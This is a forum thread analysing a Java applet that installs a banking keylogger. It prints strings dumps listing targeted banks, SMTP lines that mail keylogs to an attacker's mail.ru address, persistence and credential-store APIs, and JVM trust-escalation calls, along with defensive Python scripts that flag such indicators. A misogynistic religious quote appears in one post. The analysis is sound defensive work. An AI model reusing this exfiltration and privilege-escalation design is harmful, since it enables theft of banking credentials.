
Thread: owned as we speak

  1. #11 Cybr1d (HeadShot Master N1nja; joined Jul 2003; Boston, MA; 1,840 posts)
    Hmm... I am able to download them, but the AV will automatically pick it up. I could ignore the AV, but I'm at my workplace right now and I don't want to jeopardise any of the computers here. I'll wait until I get home to my lab PCs. Thank you very much. That was exactly what I was looking for.

    Cheers,

  2. #12 MrLinus (Just a Virtualized Geek; joined Sep 2001; Redondo Beach, CA; 7,323 posts)
    From FD on this attachment:

    From the source of that page:

    <APPLET ARCHIVE="javautil.zip" CODE="BlackBox.class" WIDTH=1 HEIGHT=1>

    BlackBox.class is detected immediately by my virus scanner as ClassLoader/E, more info:
    http://www.viruslibrary.com/virusinf...lassLoader.htm

    The javautil.zip appears to be an exe file renamed to zip. The exe is compressed with FSG.

    Interesting pieces of output from strings on the decompressed exe:


    ----------------------------------------------BEGIN
    HookerDll.Dll
    Install
    Uninstall
    EDIT
    %s\%s
    WVS3
    \kgn.txt
    Hooker.dll
    Install
    Uninstall
    Westpac
    bendigo
    Bendigo
    e-bendigo
    e-Bendigo
    commbank
    Commonwealth
    NetBank
    Citibank
    Bank of America
    e-gold
    e-bullion
    e-Bullion
    evocash
    EVOCash
    EVOcash
    intgold
    INTGold
    paypal
    PayPal
    bankwest
    Bank West
    BankWest
    National Internet Banking
    cibc
    CIBC
    scotiabank
    ScotiaBank
    Scotia Bank
    bank of montreal
    Bank of Montreal
    royalbank
    Royal Bank
    RoyalBank
    tdwaterhouse
    TD Canada Trust
    TD Waterhouse
    president's choice
    President's Choice
    President Choice
    suncorpmetway
    Suncorp
    macquarie
    Macquarie
    INTgold
    1mdc
    1MDC
    TD Waterhouse
    goldmoney
    GoldMoney
    goldgrams
    pecunix
    Pecunix
    Pecun!x
    hyperwallet
    HyperWallet
    Wells Fargo
    Bank One
    Banesto
    CAIXA
    SunTrust
    Sun Trust
    Discover Card
    Washington Mutual
    Wachovia
    desjardins
    Chase
    0+060F0
    1$11161J1U1i1
    2.2I2\2
    3'3,3E3c3h3r3
    4%42484>4D4J4P4V4\4b4h4n4t4z4
    DATA
    EHLO localhost
    Subject: KeyLog from (%s)
    MAIL FROM:<pentasatan@mail.ru>
    RCPT TO:<pentasatan@mail.ru>
    SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    open
    pstorec.dll
    PStoreCreateInstance
    internet explorer
    http://
    wininetcachecredentials
    Cookie:
    ----------------------------------------------END
    I believe a good "strings" will give you these results.
    Goodbye, Mittens (1992-2008). My pillow will be cold without your purring beside my head
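    The sorting MrLinus does by eye above (bank names, client-side SMTP verbs, a Run key, pstorec.dll) is easy to script once the sample is unpacked. The Python below is an added example, not code from the thread or from any poster: it re-implements the default `strings` rule (runs of four or more printable bytes), runs it over a constructed byte buffer that mimics the quoted dump, and buckets the hits into indicator classes. The keyword lists are illustrative and the drop address `dropbox@example.invalid` is a placeholder, not the one in the dump.

```python
"""Bucket the printable strings of an unpacked sample into indicator classes.
Added example; keyword lists are illustrative, not a complete signature set."""
import re
from collections import defaultdict

# Same default rule as `strings`: runs of at least four printable ASCII bytes.
def extract_strings(data: bytes, min_len: int = 4) -> list[str]:
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]

# Financial brands seen in the thread's dump; matched as whole strings so that
# e.g. "chase" does not fire on "purchase".
BANK_TERMS = {"westpac", "bendigo", "commbank", "netbank", "citibank", "bank of america",
              "paypal", "e-gold", "wells fargo", "chase", "cibc", "scotiabank", "wachovia"}
# Client-side SMTP verbs: a binary carrying these talks to a mail server itself.
SMTP_MARKERS = ("EHLO ", "HELO ", "MAIL FROM:", "RCPT TO:", "Subject:")
# Autostart locations a keylogger typically writes to.
PERSISTENCE_KEYS = (r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
                    r"SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce")
# Protected Storage / IE credential cache access, as in the dump.
CRED_STORE_APIS = ("pstorec.dll", "PStoreCreateInstance", "wininetcachecredentials")
MAILBOX_RE = re.compile(r"<([^<>@\s]+@[^<>\s]+)>")

def classify_strings(strings: list[str]) -> dict[str, list[str]]:
    """Return {category: [matching strings]} for the categories above."""
    hits: dict[str, list[str]] = defaultdict(list)
    for raw in strings:
        s = raw.strip()
        low = s.lower()
        if low in BANK_TERMS:
            hits["banking_target"].append(s)
        if s.startswith(SMTP_MARKERS):
            hits["smtp_exfil"].append(s)
            m = MAILBOX_RE.search(s)
            if m and m.group(1) not in hits["mailbox"]:
                hits["mailbox"].append(m.group(1))      # the drop address
        if any(k.lower() in low for k in PERSISTENCE_KEYS):
            hits["persistence"].append(s)
        if any(a.lower() in low for a in CRED_STORE_APIS):
            hits["credential_store"].append(s)
    return dict(hits)

def verdict(hits: dict[str, list[str]]) -> str:
    """Three or more independent indicator classes is a strong signal."""
    classes = ("banking_target", "smtp_exfil", "persistence", "credential_store")
    score = sum(1 for c in classes if hits.get(c))
    return "likely banking keylogger" if score >= 3 else "needs manual review"

# Constructed stand-in for the unpacked exe: strings separated by non-printable bytes.
# The mailbox is a placeholder, not the address from the thread.
SAMPLE = b"\x00\x01\x02".join([
    b"MZ\x90\x00\x03",
    b"HookerDll.Dll", b"Install", b"Uninstall",
    b"Bank of America", b"PayPal", b"Westpac",
    b"EHLO localhost",
    b"Subject: KeyLog from (%s)",
    b"MAIL FROM:<dropbox@example.invalid>",
    b"RCPT TO:<dropbox@example.invalid>",
    b"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
    b"pstorec.dll", b"PStoreCreateInstance",
    b"\xff\xfe\x80\x81",
])

if __name__ == "__main__":
    found = classify_strings(extract_strings(SAMPLE))
    for category, values in found.items():
        print(f"{category:17s} {values}")
    print("verdict:", verdict(found))
```

    Run it against the unpacked file only: on the FSG-packed javautil almost nothing passes the printable-run filter, which is exactly why the thread unpacks first. The mailbox bucket is the artefact worth handing to the mail team, since blocking that address at the gateway kills the exfiltration regardless of which bank strings the next variant carries.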

  3. #13
    <joke> -sits here, blinking- I always miss out on all the fun, being on a Linux system. </joke>

  4. #14 MrLinus (Just a Virtualized Geek; joined Sep 2001; Redondo Beach, CA; 7,323 posts)
    Oh pooh, you don't have to miss anything. Heck, half the fun of being on a *nix system is the ability to touch and play with this stuff. Why else would the *nix gods give us strings to play with?

  5. #15 Senior Member (joined Nov 2001; 4,785 posts)
    For anyone interested, javautil is packed using FSG, which can be found at illmob:

    http://illmob.com/stuff/fsg.zip

    and it must be uncompressed using it before strings can be run against it.

    Although strings was originally a Unix util, there are many Windows ports around; a Windows version can be had from:

    http://members.cox.net/dos/unix.htm

    Here are the results of strings run against blackbox.class:

    BlackBox
    java/applet/Applet
    UCL_def
    Magic_def
    stop
    Code
    LineNumberTable
    this
    Synthetic
    <init>
    Dummy
    VerifierBug
    getClass
    ()Ljava/lang/Class;
    java/lang/Object
    dummy_class
    Ljava/lang/Class;
    UCL_definition
    Magic
    myDefineClass
    )(Ljava/lang/String;[BII)Ljava/lang/Class;
    newInstance
    ()Ljava/lang/Object;
    java/lang/Class
    com.ms.security.PermissionSet
    forName
    %(Ljava/lang/String;)Ljava/lang/Class;
    doit
    getMethod
    @(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
    !com/ms/security/PermissionDataSet
    setFullyTrusted
    (Z)V
    com/ms/security/PermissionSet
    &(Lcom/ms/security/PermissionDataSet;)V
    getClassLoader
    ()Ljava/lang/ClassLoader;
    com/ms/vm/loader/URLClassLoader
    value
    !Lcom/ms/vm/loader/URLClassLoader;
    invoke
    9(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
    java/lang/reflect/Method
    Worker
    loadClass
    java/lang/Throwable
    SourceFile
    BlackBox.java
    R: +
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”
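    The raw strings dump above mixes class names, method names and JVM type descriptors because they all live in the class file's constant pool, so a proper walk of that structure gives the same names without the noise. The Python below is an added example, not from the thread: it parses the constant pool, returns the CONSTANT_Utf8 entries in order, and flags the ones that point at the Microsoft JVM trust API and class-definition machinery named in the dump. The sample class file is constructed inside the script (a pool of Utf8 and Class entries plus an empty body), and the flag descriptions are my own labels.

```python
"""Walk a Java class file's constant pool and flag sensitive references.
Added example; the sample class is built in this script, not taken from the thread."""
import struct

# Byte size of every fixed-width constant pool entry, keyed by tag (JVM spec 4.4).
# Tag 1 (Utf8) is variable-length; tags 5 and 6 occupy two pool slots.
CP_FIXED_SIZE = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4, 12: 4,
                 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}

def constant_pool_utf8(data: bytes) -> list[str]:
    """Return every CONSTANT_Utf8 entry in pool order."""
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a class file (bad magic)")
    count = struct.unpack_from(">H", data, 8)[0]   # constant_pool_count
    off, idx, out = 10, 1, []
    while idx < count:
        tag = data[off]
        off += 1
        if tag == 1:
            length = struct.unpack_from(">H", data, off)[0]
            off += 2
            # Java uses modified UTF-8; plain decoding is fine for ASCII identifiers.
            out.append(data[off:off + length].decode("utf-8", "replace"))
            off += length
        elif tag in CP_FIXED_SIZE:
            off += CP_FIXED_SIZE[tag]
        else:
            raise ValueError(f"unknown constant pool tag {tag} at offset {off - 1}")
        idx += 2 if tag in (5, 6) else 1
    return out

# Substrings worth a second look in applet code; descriptions are my own labels.
SUSPICIOUS = {
    "com/ms/security/PermissionSet": "Microsoft JVM permission API",
    "com/ms/security/PermissionDataSet": "Microsoft JVM permission API",
    "setFullyTrusted": "requests full trust for the applet",
    "defineClass": "defines classes from raw bytes at runtime",
    "com/ms/vm/loader/URLClassLoader": "Microsoft JVM class loader internals",
    "java/lang/ClassLoader": "class loader access",
}

def flag_entries(utf8s: list[str]) -> list[tuple[str, str]]:
    """Pair each suspicious pool string with the first matching description."""
    flagged = []
    for s in utf8s:
        low = s.lower()
        for needle, why in SUSPICIOUS.items():
            if needle.lower() in low:
                flagged.append((s, why))
                break
    return flagged

# Constructed minimal class file: Utf8 entries, Class entries pointing at them,
# one Long (two slots) to exercise that rule, then an empty class body.
SAMPLE_UTF8 = ["BlackBox", "java/applet/Applet", "com/ms/security/PermissionSet",
               "setFullyTrusted", "(Z)V", "myDefineClass", "LineNumberTable"]

def build_sample_class(utf8s: list[str], class_refs: list[int]) -> bytes:
    pool = b"".join(b"\x01" + struct.pack(">H", len(s)) + s.encode("utf-8") for s in utf8s)
    pool += b"".join(b"\x07" + struct.pack(">H", i) for i in class_refs)
    pool += b"\x05" + struct.pack(">Q", 0)              # CONSTANT_Long, takes 2 slots
    slots = len(utf8s) + len(class_refs) + 2
    header = b"\xca\xfe\xba\xbe" + struct.pack(">HHH", 0, 45, slots + 1)
    body = struct.pack(">HHH", 0x0021, 1, 2) + b"\x00\x00" * 4   # flags, this, super, 4 empty tables
    return header + pool + body

if __name__ == "__main__":
    names = constant_pool_utf8(build_sample_class(SAMPLE_UTF8, [1, 2]))
    for name, why in flag_entries(names):
        print(f"{name:40s} {why}")
```

    Point `constant_pool_utf8` at a real `.class` by reading the file into `data`; the pool walk stops at the end of the constant pool, so the method bodies are never touched. Matching on `defineClass` case-insensitively is deliberate: the dump shows the wrapper named `myDefineClass`, and a naive exact match would miss it.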

  6. #16 deftones12 (Senior Member; joined Jan 2003; cali forn i a; 333 posts)
    I don't see Visa on that list, Ms. Mittens. Guess I'm safe, heh.

  7. #17
    The only way to be safe these days is not to be online, it seems.
    But still, it is pretty funny how these sorts of viruses (if you can call them that) seem to keep popping up time after time.

    cheers
    .:front2back:.
